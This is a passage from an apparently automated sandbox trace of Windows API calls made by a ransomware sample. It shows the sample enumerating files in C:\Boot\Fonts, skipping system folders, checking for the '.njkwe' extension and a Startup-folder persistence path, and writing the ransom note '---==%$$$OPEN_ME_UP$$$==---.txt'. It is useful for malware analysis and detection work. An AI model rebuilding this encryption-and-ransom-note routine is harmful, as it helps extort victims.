(lpString1="malgunn_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.051] lstrcmpW (lpString1="malgunn_boot.ttf", lpString2="taridd") returned -1 [0065.051] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.051] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.052] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8f4db4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2b506, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0065.052] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="Windows") returned -1 [0065.052] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.052] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="System Volume Information") returned -1 [0065.052] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="Program Files") returned -1 [0065.052] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.052] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf") returned 33 [0065.052] StrStrIW (lpFirst="malgun_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.052] lstrcmpW (lpString1="malgun_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.052] lstrcmpW (lpString1="malgun_boot.ttf", lpString2="taridd") returned -1 [0065.052] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.052] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.063] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9072c7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2318a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0065.063] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="Windows") returned -1 [0065.063] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.063] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="System Volume Information") returned -1 [0065.064] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="Program Files") returned -1 [0065.064] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.064] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 34 [0065.064] StrStrIW (lpFirst="meiryon_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.064] lstrcmpW (lpString1="meiryon_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.064] lstrcmpW (lpString1="meiryon_boot.ttf", lpString2="taridd") returned -1 [0065.064] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.064] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.066] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef918492, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2380b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0065.066] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="Windows") returned -1 [0065.066] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.066] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="System Volume Information") returned -1 [0065.066] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="Program Files") returned -1 [0065.066] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.066] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 33 [0065.066] StrStrIW (lpFirst="meiryo_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.066] lstrcmpW (lpString1="meiryo_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.066] lstrcmpW (lpString1="meiryo_boot.ttf", lpString2="taridd") returned -1 [0065.066] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.066] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.067] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef92a947, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x27a1b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0065.067] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="Windows") returned -1 [0065.067] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.067] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="System Volume Information") returned -1 [0065.068] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="Program Files") returned -1 [0065.068] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.068] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 32 [0065.068] StrStrIW (lpFirst="msjhn_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.068] lstrcmpW (lpString1="msjhn_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.068] lstrcmpW (lpString1="msjhn_boot.ttf", lpString2="taridd") returned -1 [0065.068] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.068] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.068] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef93ce3b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x281fb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0065.068] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="Windows") returned -1 [0065.068] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.068] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="System Volume Information") returned -1 [0065.068] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="Program Files") returned -1 [0065.068] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.068] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf") returned 31 [0065.068] StrStrIW (lpFirst="msjh_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.068] lstrcmpW (lpString1="msjh_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.068] lstrcmpW (lpString1="msjh_boot.ttf", lpString2="taridd") returned -1 [0065.068] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.068] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.069] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef94dfcd, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x25b3b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0065.069] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="Windows") returned -1 [0065.069] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.069] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="System Volume Information") returned -1 [0065.069] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="Program Files") returned -1 [0065.069] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.069] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 32 [0065.069] StrStrIW (lpFirst="msyhn_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.069] lstrcmpW (lpString1="msyhn_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.069] lstrcmpW (lpString1="msyhn_boot.ttf", lpString2="taridd") returned -1 [0065.069] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.069] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.069] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef95f141, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x26255, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0065.069] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="Windows") returned -1 [0065.069] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.069] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="System Volume Information") returned -1 [0065.069] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="Program Files") returned -1 [0065.069] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.069] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf") returned 31 [0065.069] StrStrIW (lpFirst="msyh_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.069] lstrcmpW (lpString1="msyh_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.069] lstrcmpW (lpString1="msyh_boot.ttf", lpString2="taridd") returned -1 [0065.069] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.069] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.069] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef96ef3e, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf3b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0065.070] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="Windows") returned -1 [0065.070] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.070] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="System Volume Information") returned -1 [0065.070] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="Program Files") returned 1 [0065.070] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="Program Files (x86)") returned 1 [0065.070] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf") returned 34 [0065.070] StrStrIW (lpFirst="segmono_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.070] lstrcmpW (lpString1="segmono_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.070] lstrcmpW (lpString1="segmono_boot.ttf", lpString2="taridd") returned -1 [0065.070] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.070] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.070] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c0da69, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef97d9ab, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x14f66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0065.070] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="Windows") returned -1 [0065.070] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="$Recycle.bin") returned 1 [0065.070] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="System Volume Information") returned -1 [0065.070] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="Program Files") returned 1 [0065.070] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="Program Files (x86)") returned 1 [0065.070] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 35 [0065.070] StrStrIW (lpFirst="segoen_slboot.ttf", lpSrch=".njkwe") returned 0x0 [0065.071] lstrcmpW (lpString1="segoen_slboot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.071] lstrcmpW (lpString1="segoen_slboot.ttf", lpString2="taridd") returned -1 [0065.071] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.071] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.072] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef98c419, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x150a2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0065.072] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="Windows") returned -1 [0065.072] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="$Recycle.bin") returned 1 [0065.072] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="System Volume Information") returned -1 [0065.072] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="Program Files") returned 1 [0065.072] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="Program Files (x86)") returned 1 [0065.072] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 34 [0065.072] StrStrIW (lpFirst="segoe_slboot.ttf", lpSrch=".njkwe") returned 0x0 [0065.072] lstrcmpW (lpString1="segoe_slboot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.072] lstrcmpW (lpString1="segoe_slboot.ttf", lpString2="taridd") returned -1 [0065.072] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.072] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.072] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0065.072] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Windows") returned -1 [0065.072] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.072] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="System Volume Information") returned 1 [0065.072] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Program Files") returned 1 [0065.072] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Program Files (x86)") returned 1 [0065.072] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0065.072] StrStrIW (lpFirst="wgl4_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.072] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.072] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="taridd") returned 1 [0065.072] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.072] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.072] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0065.072] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0065.073] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.073] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\fonts\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.074] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.075] CloseHandle (hObject=0x428) returned 1 [0065.075] GetProcessHeap () returned 0xbe0000 [0065.075] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.075] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0065.075] lstrcmpiW (lpString1="fr-CA", lpString2="Windows") returned -1 [0065.075] lstrcmpiW (lpString1="fr-CA", lpString2="$Recycle.bin") returned 1 [0065.075] lstrcmpiW (lpString1="fr-CA", lpString2="System Volume Information") returned -1 [0065.075] lstrcmpiW (lpString1="fr-CA", lpString2="Program Files") returned -1 [0065.075] lstrcmpiW (lpString1="fr-CA", lpString2="Program Files (x86)") returned -1 [0065.075] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA") returned 17 [0065.075] lstrcmpW (lpString1="fr-CA", lpString2=".") returned 1 [0065.075] lstrcmpW (lpString1="fr-CA", lpString2="..") returned 1 [0065.075] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\fr-CA", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.075] GetProcessHeap () returned 0xbe0000 [0065.075] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 